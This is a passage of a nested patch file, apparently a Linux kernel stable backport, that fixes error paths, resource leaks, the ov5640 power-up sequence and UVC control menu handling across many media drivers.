+ 	/* Apply customized values from user */
+ 	ret =  __v4l2_ctrl_handler_setup(imx219->sd.ctrl_handler);
+ 	if (ret)
+diff --git a/drivers/media/i2c/max9286.c b/drivers/media/i2c/max9286.c
+index 9c083cf142319..d034a67042e35 100644
+--- a/drivers/media/i2c/max9286.c
++++ b/drivers/media/i2c/max9286.c
+@@ -932,6 +932,7 @@ static int max9286_v4l2_register(struct max9286_priv *priv)
+ err_put_node:
+ 	fwnode_handle_put(ep);
+ err_async:
++	v4l2_ctrl_handler_free(&priv->ctrls);
+ 	max9286_v4l2_notifier_unregister(priv);
+ 
+ 	return ret;
+diff --git a/drivers/media/i2c/ov2740.c b/drivers/media/i2c/ov2740.c
+index f3731f932a946..89d126240c345 100644
+--- a/drivers/media/i2c/ov2740.c
++++ b/drivers/media/i2c/ov2740.c
+@@ -629,8 +629,10 @@ static int ov2740_init_controls(struct ov2740 *ov2740)
+ 				     V4L2_CID_TEST_PATTERN,
+ 				     ARRAY_SIZE(ov2740_test_pattern_menu) - 1,
+ 				     0, 0, ov2740_test_pattern_menu);
+-	if (ctrl_hdlr->error)
++	if (ctrl_hdlr->error) {
++		v4l2_ctrl_handler_free(ctrl_hdlr);
+ 		return ctrl_hdlr->error;
++	}
+ 
+ 	ov2740->sd.ctrl_handler = ctrl_hdlr;
+ 
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index e0f908af581b8..c159f297ab92a 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -50,6 +50,7 @@
+ #define OV5640_REG_SYS_CTRL0		0x3008
+ #define OV5640_REG_SYS_CTRL0_SW_PWDN	0x42
+ #define OV5640_REG_SYS_CTRL0_SW_PWUP	0x02
++#define OV5640_REG_SYS_CTRL0_SW_RST	0x82
+ #define OV5640_REG_CHIP_ID		0x300a
+ #define OV5640_REG_IO_MIPI_CTRL00	0x300e
+ #define OV5640_REG_PAD_OUTPUT_ENABLE01	0x3017
+@@ -532,7 +533,7 @@ static const struct v4l2_mbus_framefmt ov5640_default_fmt = {
+ };
+ 
+ static const struct reg_value ov5640_init_setting[] = {
+-	{0x3103, 0x11, 0, 0}, {0x3008, 0x82, 0, 5}, {0x3008, 0x42, 0, 0},
++	{0x3103, 0x11, 0, 0},
+ 	{0x3103, 0x03, 0, 0}, {0x3630, 0x36, 0, 0},
+ 	{0x3631, 0x0e, 0, 0}, {0x3632, 0xe2, 0, 0}, {0x3633, 0x12, 0, 0},
+ 	{0x3621, 0xe0, 0, 0}, {0x3704, 0xa0, 0, 0}, {0x3703, 0x5a, 0, 0},
+@@ -2424,24 +2425,48 @@ static void ov5640_power(struct ov5640_dev *sensor, bool enable)
+ 	gpiod_set_value_cansleep(sensor->pwdn_gpio, enable ? 0 : 1);
+ }
+ 
+-static void ov5640_reset(struct ov5640_dev *sensor)
++/*
++ * From section 2.7 power up sequence:
++ * t0 + t1 + t2 >= 5ms	Delay from DOVDD stable to PWDN pull down
++ * t3 >= 1ms		Delay from PWDN pull down to RESETB pull up
++ * t4 >= 20ms		Delay from RESETB pull up to SCCB (i2c) stable
++ *
++ * Some modules don't expose RESETB/PWDN pins directly, instead providing a
++ * "PWUP" GPIO which is wired through appropriate delays and inverters to the
++ * pins.
++ *
++ * In such cases, this gpio should be mapped to pwdn_gpio in the driver, and we
++ * should still toggle the pwdn_gpio below with the appropriate delays, while
++ * the calls to reset_gpio will be ignored.
++ */
++static void ov5640_powerup_sequence(struct ov5640_dev *sensor)
+ {
+-	if (!sensor->reset_gpio)
+-		return;
+-
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++	if (sensor->pwdn_gpio) {
++		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
+ 
+-	/* camera power cycle */
+-	ov5640_power(sensor, false);
+-	usleep_range(5000, 10000);
+-	ov5640_power(sensor, true);
+-	usleep_range(5000, 10000);
++		/* camera power cycle */
++		ov5640_power(sensor, false);
++		usleep_range(5000, 10000);
++		ov5640_power(sensor, true);
++		usleep_range(5000, 10000);
+ 
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 1);
+-	usleep_range(1000, 2000);
++		gpiod_set_value_cansleep(sensor->reset_gpio, 1);
++		usleep_range(1000, 2000);
+ 
+-	gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++	} else {
++		/* software reset */
++		ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
++				 OV5640_REG_SYS_CTRL0_SW_RST);
++	}
+ 	usleep_range(20000, 25000);
++
++	/*
++	 * software standby: allows register programming;
++	 * exit at restore_mode() for CSI, s_stream(1) for DVP
++	 */
++	ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
++			 OV5640_REG_SYS_CTRL0_SW_PWDN);
+ }
+ 
+ static int ov5640_set_power_on(struct ov5640_dev *sensor)
+@@ -2464,8 +2489,7 @@ static int ov5640_set_power_on(struct ov5640_dev *sensor)
+ 		goto xclk_off;
+ 	}
+ 
+-	ov5640_reset(sensor);
+-	ov5640_power(sensor, true);
++	ov5640_powerup_sequence(sensor);
+ 
+ 	ret = ov5640_init_slave_id(sensor);
+ 	if (ret)
+diff --git a/drivers/media/i2c/ov5675.c b/drivers/media/i2c/ov5675.c
+index 94dc8cb7a7c00..a6e6b367d1283 100644
+--- a/drivers/media/i2c/ov5675.c
++++ b/drivers/media/i2c/ov5675.c
+@@ -820,8 +820,10 @@ static int ov5675_init_controls(struct ov5675 *ov5675)
+ 	v4l2_ctrl_new_std(ctrl_hdlr, &ov5675_ctrl_ops,
+ 			  V4L2_CID_VFLIP, 0, 1, 1, 0);
+ 
+-	if (ctrl_hdlr->error)
++	if (ctrl_hdlr->error) {
++		v4l2_ctrl_handler_free(ctrl_hdlr);
+ 		return ctrl_hdlr->error;
++	}
+ 
+ 	ov5675->sd.ctrl_handler = ctrl_hdlr;
+ 
+diff --git a/drivers/media/i2c/ov7670.c b/drivers/media/i2c/ov7670.c
+index 11d3bef65d43c..6e423cbcdc462 100644
+--- a/drivers/media/i2c/ov7670.c
++++ b/drivers/media/i2c/ov7670.c
+@@ -1840,7 +1840,7 @@ static int ov7670_parse_dt(struct device *dev,
+ 
+ 	if (bus_cfg.bus_type != V4L2_MBUS_PARALLEL) {
+ 		dev_err(dev, "Unsupported media bus type\n");
+-		return ret;
++		return -EINVAL;
+ 	}
+ 	info->mbus_config = bus_cfg.bus.parallel.flags;
+ 
+diff --git a/drivers/media/i2c/ov772x.c b/drivers/media/i2c/ov772x.c
+index 4189e3fc3d535..a238e63425f8c 100644
+--- a/drivers/media/i2c/ov772x.c
++++ b/drivers/media/i2c/ov772x.c
+@@ -1462,7 +1462,7 @@ static int ov772x_probe(struct i2c_client *client)
+ 	priv->subdev.ctrl_handler = &priv->hdl;
+ 	if (priv->hdl.error) {
+ 		ret = priv->hdl.error;
+-		goto error_mutex_destroy;
++		goto error_ctrl_free;
+ 	}
+ 
+ 	priv->clk = clk_get(&client->dev, NULL);
+@@ -1515,7 +1515,6 @@ error_clk_put:
+ 	clk_put(priv->clk);
+ error_ctrl_free:
+ 	v4l2_ctrl_handler_free(&priv->hdl);
+-error_mutex_destroy:
+ 	mutex_destroy(&priv->lock);
+ 
+ 	return ret;
+diff --git a/drivers/media/i2c/tc358746.c b/drivers/media/i2c/tc358746.c
+index d1f552bd81d42..4063754a67320 100644
+--- a/drivers/media/i2c/tc358746.c
++++ b/drivers/media/i2c/tc358746.c
+@@ -406,7 +406,7 @@ tc358746_apply_pll_config(struct tc358746 *tc358746)
+ 
+ 	val = PLL_FRS(ilog2(post)) | RESETB | PLL_EN;
+ 	mask = PLL_FRS_MASK | RESETB | PLL_EN;
+-	tc358746_update_bits(tc358746, PLLCTL1_REG, mask, val);
++	err = tc358746_update_bits(tc358746, PLLCTL1_REG, mask, val);
+ 	if (err)
+ 		return err;
+ 
+@@ -988,6 +988,8 @@ static int __maybe_unused
+ tc358746_g_register(struct v4l2_subdev *sd, struct v4l2_dbg_register *reg)
+ {
+ 	struct tc358746 *tc358746 = to_tc358746(sd);
++	u32 val;
++	int err;
+ 
+ 	/* 32-bit registers starting from CLW_DPHYCONTTX */
+ 	reg->size = reg->reg < CLW_DPHYCONTTX_REG ? 2 : 4;
+@@ -995,12 +997,13 @@ tc358746_g_register(struct v4l2_subdev *sd, struct v4l2_dbg_register *reg)
+ 	if (!pm_runtime_get_if_in_use(sd->dev))
+ 		return 0;
+ 
+-	tc358746_read(tc358746, reg->reg, (u32 *)&reg->val);
++	err = tc358746_read(tc358746, reg->reg, &val);
++	reg->val = val;
+ 
+ 	pm_runtime_mark_last_busy(sd->dev);
+ 	pm_runtime_put_sync_autosuspend(sd->dev);
+ 
+-	return 0;
++	return err;
+ }
+ 
+ static int __maybe_unused
+diff --git a/drivers/media/mc/mc-entity.c b/drivers/media/mc/mc-entity.c
+index b8bcbc734eaf4..f268cf66053e1 100644
+--- a/drivers/media/mc/mc-entity.c
++++ b/drivers/media/mc/mc-entity.c
+@@ -703,7 +703,7 @@ done:
+ __must_check int __media_pipeline_start(struct media_pad *pad,
+ 					struct media_pipeline *pipe)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	struct media_pipeline_pad *err_ppad;
+ 	struct media_pipeline_pad *ppad;
+ 	int ret;
+@@ -851,7 +851,7 @@ EXPORT_SYMBOL_GPL(__media_pipeline_start);
+ __must_check int media_pipeline_start(struct media_pad *pad,
+ 				      struct media_pipeline *pipe)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	int ret;
+ 
+ 	mutex_lock(&mdev->graph_mutex);
+@@ -888,7 +888,7 @@ EXPORT_SYMBOL_GPL(__media_pipeline_stop);
+ 
+ void media_pipeline_stop(struct media_pad *pad)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 
+ 	mutex_lock(&mdev->graph_mutex);
+ 	__media_pipeline_stop(pad);
+@@ -898,7 +898,7 @@ EXPORT_SYMBOL_GPL(media_pipeline_stop);
+ 
+ __must_check int media_pipeline_alloc_start(struct media_pad *pad)
+ {
+-	struct media_device *mdev = pad->entity->graph_obj.mdev;
++	struct media_device *mdev = pad->graph_obj.mdev;
+ 	struct media_pipeline *new_pipe = NULL;
+ 	struct media_pipeline *pipe;
+ 	int ret;
+diff --git a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+index 390bd5ea34724..3b76a9d0383a8 100644
+--- a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
++++ b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+@@ -1843,6 +1843,9 @@ static void cio2_pci_remove(struct pci_dev *pci_dev)
+ 	v4l2_device_unregister(&cio2->v4l2_dev);
+ 	media_device_cleanup(&cio2->media_dev);
+ 	mutex_destroy(&cio2->lock);
++
++	pm_runtime_forbid(&pci_dev->dev);
++	pm_runtime_get_noresume(&pci_dev->dev);
+ }
+ 
+ static int __maybe_unused cio2_runtime_suspend(struct device *dev)
+diff --git a/drivers/media/pci/saa7134/saa7134-core.c b/drivers/media/pci/saa7134/saa7134-core.c
+index 96328b0af1641..cf2871306987c 100644
+--- a/drivers/media/pci/saa7134/saa7134-core.c
++++ b/drivers/media/pci/saa7134/saa7134-core.c
+@@ -978,7 +978,7 @@ static void saa7134_unregister_video(struct saa7134_dev *dev)
+ 	}
+ 	if (dev->radio_dev) {
+ 		if (video_is_registered(dev->radio_dev))
+-			vb2_video_unregister_device(dev->radio_dev);
++			video_unregister_device(dev->radio_dev);
+ 		else
+ 			video_device_release(dev->radio_dev);
+ 		dev->radio_dev = NULL;
+diff --git a/drivers/media/platform/amphion/vpu_color.c b/drivers/media/platform/amphion/vpu_color.c
+index 80b9a53fd1c14..4ae435cbc5cda 100644
+--- a/drivers/media/platform/amphion/vpu_color.c
++++ b/drivers/media/platform/amphion/vpu_color.c
+@@ -17,7 +17,7 @@
+ #include "vpu_helpers.h"
+ 
+ static const u8 colorprimaries[] = {
+-	0,
++	V4L2_COLORSPACE_LAST,
+ 	V4L2_COLORSPACE_REC709,         /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+@@ -31,7 +31,7 @@ static const u8 colorprimaries[] = {
+ };
+ 
+ static const u8 colortransfers[] = {
+-	0,
++	V4L2_XFER_FUNC_LAST,
+ 	V4L2_XFER_FUNC_709,             /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+@@ -53,7 +53,7 @@ static const u8 colortransfers[] = {
+ };
+ 
+ static const u8 colormatrixcoefs[] = {
+-	0,
++	V4L2_YCBCR_ENC_LAST,
+ 	V4L2_YCBCR_ENC_709,              /*Rec. ITU-R BT.709-6*/
+ 	0,
+ 	0,
+diff --git a/drivers/media/platform/mediatek/mdp3/Kconfig b/drivers/media/platform/mediatek/mdp3/Kconfig
+index 846e759a8f6a9..602329c447501 100644
+--- a/drivers/media/platform/mediatek/mdp3/Kconfig
++++ b/drivers/media/platform/mediatek/mdp3/Kconfig
+@@ -3,14 +3,13 @@ config VIDEO_MEDIATEK_MDP3
+ 	tristate "MediaTek MDP v3 driver"
+ 	depends on MTK_IOMMU || COMPILE_TEST
+ 	depends on VIDEO_DEV
+-	depends on ARCH_MEDIATEK || COMPILE_TEST
+ 	depends on HAS_DMA
+ 	depends on REMOTEPROC
++	depends on MTK_MMSYS
++	depends on MTK_CMDQ
++	depends on MTK_SCP
+ 	select VIDEOBUF2_DMA_CONTIG
+ 	select V4L2_MEM2MEM_DEV
+-	select MTK_MMSYS
+-	select MTK_CMDQ
+-	select MTK_SCP
+ 	default n
+ 	help
+ 	    It is a v4l2 driver and present in MediaTek MT8183 SoC.
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+index 2d1f6ae9f0802..97edcd9d1c817 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+@@ -207,8 +207,8 @@ static int mdp_probe(struct platform_device *pdev)
+ 	}
+ 	for (i = 0; i < MDP_PIPE_MAX; i++) {
+ 		mdp->mdp_mutex[i] = mtk_mutex_get(&mm_pdev->dev);
+-		if (!mdp->mdp_mutex[i]) {
+-			ret = -ENODEV;
++		if (IS_ERR(mdp->mdp_mutex[i])) {
++			ret = PTR_ERR(mdp->mdp_mutex[i]);
+ 			goto err_free_mutex;
+ 		}
+ 	}
+@@ -289,7 +289,8 @@ err_deinit_comp:
+ 	mdp_comp_destroy(mdp);
+ err_free_mutex:
+ 	for (i = 0; i < MDP_PIPE_MAX; i++)
+-		mtk_mutex_put(mdp->mdp_mutex[i]);
++		if (!IS_ERR_OR_NULL(mdp->mdp_mutex[i]))
++			mtk_mutex_put(mdp->mdp_mutex[i]);
+ err_destroy_device:
+ 	kfree(mdp);
+ err_return:
+diff --git a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
+index 6cd015a35f7c4..f085f14d676ad 100644
+--- a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
++++ b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.c
+@@ -2472,19 +2472,12 @@ static int mxc_jpeg_probe(struct platform_device *pdev)
+ 	jpeg->mode = mode;
+ 
+ 	/* Get clocks */
+-	jpeg->clk_ipg = devm_clk_get(dev, "ipg");
+-	if (IS_ERR(jpeg->clk_ipg)) {
+-		dev_err(dev, "failed to get clock: ipg\n");
+-		ret = PTR_ERR(jpeg->clk_ipg);
+-		goto err_clk;
+-	}
+-
+-	jpeg->clk_per = devm_clk_get(dev, "per");
+-	if (IS_ERR(jpeg->clk_per)) {
+-		dev_err(dev, "failed to get clock: per\n");
+-		ret = PTR_ERR(jpeg->clk_per);
++	ret = devm_clk_bulk_get_all(&pdev->dev, &jpeg->clks);
++	if (ret < 0) {
++		dev_err(dev, "failed to get clock\n");
+ 		goto err_clk;
+ 	}
++	jpeg->num_clks = ret;
+ 
+ 	ret = mxc_jpeg_attach_pm_domains(jpeg);
+ 	if (ret < 0) {
+@@ -2581,32 +2574,20 @@ static int mxc_jpeg_runtime_resume(struct device *dev)
+ 	struct mxc_jpeg_dev *jpeg = dev_get_drvdata(dev);
+ 	int ret;
+ 
+-	ret = clk_prepare_enable(jpeg->clk_ipg);
+-	if (ret < 0) {
+-		dev_err(dev, "failed to enable clock: ipg\n");
+-		goto err_ipg;
+-	}
+-
+-	ret = clk_prepare_enable(jpeg->clk_per);
++	ret = clk_bulk_prepare_enable(jpeg->num_clks, jpeg->clks);
+ 	if (ret < 0) {
+-		dev_err(dev, "failed to enable clock: per\n");
+-		goto err_per;
++		dev_err(dev, "failed to enable clock\n");
++		return ret;
+ 	}
+ 
+ 	return 0;
+-
+-err_per:
+-	clk_disable_unprepare(jpeg->clk_ipg);
+-err_ipg:
+-	return ret;
+ }
+ 
+ static int mxc_jpeg_runtime_suspend(struct device *dev)
+ {
+ 	struct mxc_jpeg_dev *jpeg = dev_get_drvdata(dev);
+ 
+-	clk_disable_unprepare(jpeg->clk_ipg);
+-	clk_disable_unprepare(jpeg->clk_per);
++	clk_bulk_disable_unprepare(jpeg->num_clks, jpeg->clks);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
+index 8fa8c0aec5a2d..87157db780826 100644
+--- a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
++++ b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
+@@ -120,8 +120,8 @@ struct mxc_jpeg_dev {
+ 	spinlock_t			hw_lock; /* hardware access lock */
+ 	unsigned int			mode;
+ 	struct mutex			lock; /* v4l2 ioctls serialization */
+-	struct clk			*clk_ipg;
+-	struct clk			*clk_per;
++	struct clk_bulk_data		*clks;
++	int				num_clks;
+ 	struct platform_device		*pdev;
+ 	struct device			*dev;
+ 	void __iomem			*base_reg;
+diff --git a/drivers/media/platform/nxp/imx7-media-csi.c b/drivers/media/platform/nxp/imx7-media-csi.c
+index 886374d3a6ff1..1ef92c8c0098c 100644
+--- a/drivers/media/platform/nxp/imx7-media-csi.c
++++ b/drivers/media/platform/nxp/imx7-media-csi.c
+@@ -638,8 +638,10 @@ static int imx7_csi_init(struct imx7_csi *csi)
+ 	imx7_csi_configure(csi);
+ 
+ 	ret = imx7_csi_dma_setup(csi);
+-	if (ret < 0)
++	if (ret < 0) {
++		clk_disable_unprepare(csi->mclk);
+ 		return ret;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+index 451a4c9b3d30d..04baa80494c66 100644
+--- a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
++++ b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+@@ -429,7 +429,8 @@ static void csiphy_gen2_config_lanes(struct csiphy_device *csiphy,
+ 		array_size = ARRAY_SIZE(lane_regs_sm8250[0]);
+ 		break;
+ 	default:
+-		unreachable();
++		WARN(1, "unknown cspi version\n");
++		return;
+ 	}
+ 
+ 	for (l = 0; l < 5; l++) {
+diff --git a/drivers/media/platform/ti/cal/cal.c b/drivers/media/platform/ti/cal/cal.c
+index 56b61c0583cf8..1236215ec70eb 100644
+--- a/drivers/media/platform/ti/cal/cal.c
++++ b/drivers/media/platform/ti/cal/cal.c
+@@ -1050,8 +1050,10 @@ static struct cal_ctx *cal_ctx_create(struct cal_dev *cal, int inst)
+ 	ctx->cport = inst;
+ 
+ 	ret = cal_ctx_v4l2_init(ctx);
+-	if (ret)
++	if (ret) {
++		kfree(ctx);
+ 		return NULL;
++	}
+ 
+ 	return ctx;
+ }
+diff --git a/drivers/media/platform/ti/omap3isp/isp.c b/drivers/media/platform/ti/omap3isp/isp.c
+index 1d40bb59ff814..e7327e38482de 100644
+--- a/drivers/media/platform/ti/omap3isp/isp.c
++++ b/drivers/media/platform/ti/omap3isp/isp.c
+@@ -2307,7 +2307,16 @@ static int isp_probe(struct platform_device *pdev)
+ 
+ 	/* Regulators */
+ 	isp->isp_csiphy1.vdd = devm_regulator_get(&pdev->dev, "vdd-csiphy1");
++	if (IS_ERR(isp->isp_csiphy1.vdd)) {
++		ret = PTR_ERR(isp->isp_csiphy1.vdd);
++		goto error;
++	}
++
+ 	isp->isp_csiphy2.vdd = devm_regulator_get(&pdev->dev, "vdd-csiphy2");
++	if (IS_ERR(isp->isp_csiphy2.vdd)) {
++		ret = PTR_ERR(isp->isp_csiphy2.vdd);
++		goto error;
++	}
+ 
+ 	/* Clocks
+ 	 *
+diff --git a/drivers/media/platform/verisilicon/hantro_v4l2.c b/drivers/media/platform/verisilicon/hantro_v4l2.c
+index 2c7a805289e7b..30e650edaea8a 100644
+--- a/drivers/media/platform/verisilicon/hantro_v4l2.c
++++ b/drivers/media/platform/verisilicon/hantro_v4l2.c
+@@ -161,8 +161,11 @@ static int vidioc_enum_framesizes(struct file *file, void *priv,
+ 	}
+ 
+ 	/* For non-coded formats check if postprocessing scaling is possible */
+-	if (fmt->codec_mode == HANTRO_MODE_NONE && hantro_needs_postproc(ctx, fmt)) {
+-		return hanto_postproc_enum_framesizes(ctx, fsize);
++	if (fmt->codec_mode == HANTRO_MODE_NONE) {
++		if (hantro_needs_postproc(ctx, fmt))
++			return hanto_postproc_enum_framesizes(ctx, fsize);
++		else
++			return -ENOTTY;
+ 	} else if (fsize->index != 0) {
+ 		vpu_debug(0, "invalid frame size index (expected 0, got %d)\n",
+ 			  fsize->index);
+diff --git a/drivers/media/rc/ene_ir.c b/drivers/media/rc/ene_ir.c
+index e09270916fbca..11ee21a7db8f0 100644
+--- a/drivers/media/rc/ene_ir.c
++++ b/drivers/media/rc/ene_ir.c
+@@ -1106,6 +1106,8 @@ static void ene_remove(struct pnp_dev *pnp_dev)
+ 	struct ene_device *dev = pnp_get_drvdata(pnp_dev);
+ 	unsigned long flags;
+ 
++	rc_unregister_device(dev->rdev);
++	del_timer_sync(&dev->tx_sim_timer);
+ 	spin_lock_irqsave(&dev->hw_lock, flags);
+ 	ene_rx_disable(dev);
+ 	ene_rx_restore_hw_buffer(dev);
+@@ -1113,7 +1115,6 @@ static void ene_remove(struct pnp_dev *pnp_dev)
+ 
+ 	free_irq(dev->irq, dev);
+ 	release_region(dev->hw_io, ENE_IO_SIZE);
+-	rc_unregister_device(dev->rdev);
+ 	kfree(dev);
+ }
+ 
+diff --git a/drivers/media/usb/siano/smsusb.c b/drivers/media/usb/siano/smsusb.c
+index fe9c7b3a950e8..6f443c542c6da 100644
+--- a/drivers/media/usb/siano/smsusb.c
++++ b/drivers/media/usb/siano/smsusb.c
+@@ -179,6 +179,7 @@ static void smsusb_stop_streaming(struct smsusb_device_t *dev)
+ 
+ 	for (i = 0; i < MAX_URBS; i++) {
+ 		usb_kill_urb(&dev->surbs[i].urb);
++		cancel_work_sync(&dev->surbs[i].wq);
+ 
+ 		if (dev->surbs[i].cb) {
+ 			smscore_putbuffer(dev->coredev, dev->surbs[i].cb);
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index c95a2229f4fa9..44b0cfb8ee1c7 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <linux/bitops.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+ #include <linux/module.h>
+@@ -525,7 +526,8 @@ static const struct uvc_control_mapping uvc_ctrl_mappings[] = {
+ 		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+ 		.data_type	= UVC_CTRL_DATA_TYPE_BITMASK,
+ 		.menu_info	= exposure_auto_controls,
+-		.menu_count	= ARRAY_SIZE(exposure_auto_controls),
++		.menu_mask	= GENMASK(V4L2_EXPOSURE_APERTURE_PRIORITY,
++					  V4L2_EXPOSURE_AUTO),
+ 		.slave_ids	= { V4L2_CID_EXPOSURE_ABSOLUTE, },
+ 	},
+ 	{
+@@ -721,32 +723,53 @@ static const struct uvc_control_mapping uvc_ctrl_mappings[] = {
+ 	},
+ };
+ 
+-static const struct uvc_control_mapping uvc_ctrl_mappings_uvc11[] = {
+-	{
+-		.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-		.entity		= UVC_GUID_UVC_PROCESSING,
+-		.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-		.size		= 2,
+-		.offset		= 0,
+-		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-		.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-		.menu_info	= power_line_frequency_controls,
+-		.menu_count	= ARRAY_SIZE(power_line_frequency_controls) - 1,
+-	},
++const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_60HZ,
++				  V4L2_CID_POWER_LINE_FREQUENCY_50HZ),
+ };
+ 
+-static const struct uvc_control_mapping uvc_ctrl_mappings_uvc15[] = {
+-	{
+-		.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-		.entity		= UVC_GUID_UVC_PROCESSING,
+-		.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-		.size		= 2,
+-		.offset		= 0,
+-		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-		.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-		.menu_info	= power_line_frequency_controls,
+-		.menu_count	= ARRAY_SIZE(power_line_frequency_controls),
+-	},
++static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_uvc11 = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_60HZ,
++				  V4L2_CID_POWER_LINE_FREQUENCY_DISABLED),
++};
++
++static const struct uvc_control_mapping *uvc_ctrl_mappings_uvc11[] = {
++	&uvc_ctrl_power_line_mapping_uvc11,
++	NULL, /* Sentinel */
++};
++
++static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_uvc15 = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_AUTO,
++				  V4L2_CID_POWER_LINE_FREQUENCY_DISABLED),
++};
++
++static const struct uvc_control_mapping *uvc_ctrl_mappings_uvc15[] = {
++	&uvc_ctrl_power_line_mapping_uvc15,
++	NULL, /* Sentinel */
+ };
+ 
+ /* ------------------------------------------------------------------------
+@@ -975,7 +998,9 @@ static s32 __uvc_ctrl_get_value(struct uvc_control_mapping *mapping,
+ 		const struct uvc_menu_info *menu = mapping->menu_info;
+ 		unsigned int i;
+ 
+-		for (i = 0; i < mapping->menu_count; ++i, ++menu) {
++		for (i = 0; BIT(i) <= mapping->menu_mask; ++i, ++menu) {
++			if (!test_bit(i, &mapping->menu_mask))
++				continue;
+ 			if (menu->value == value) {
+ 				value = i;
+ 				break;
+@@ -1085,11 +1110,28 @@ static int uvc_query_v4l2_class(struct uvc_video_chain *chain, u32 req_id,
+ 	return 0;
+ }
+ 
++/*
++ * Check if control @v4l2_id can be accessed by the given control @ioctl
++ * (VIDIOC_G_EXT_CTRLS, VIDIOC_TRY_EXT_CTRLS or VIDIOC_S_EXT_CTRLS).
++ *
++ * For set operations on slave controls, check if the master's value is set to
++ * manual, either in the other controls set in the same ioctl call, or from
++ * the master's current value. This catches VIDIOC_S_EXT_CTRLS calls that set
++ * both the master and slave control, for instance setting
++ * auto_exposure=1, exposure_time_absolute=251.
++ */
+ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+-			   bool read)
++			   const struct v4l2_ext_controls *ctrls,
++			   unsigned long ioctl)
+ {
++	struct uvc_control_mapping *master_map = NULL;
++	struct uvc_control *master_ctrl = NULL;
+ 	struct uvc_control_mapping *mapping;
+ 	struct uvc_control *ctrl;
++	bool read = ioctl == VIDIOC_G_EXT_CTRLS;
++	s32 val;
++	int ret;
++	int i;
+ 
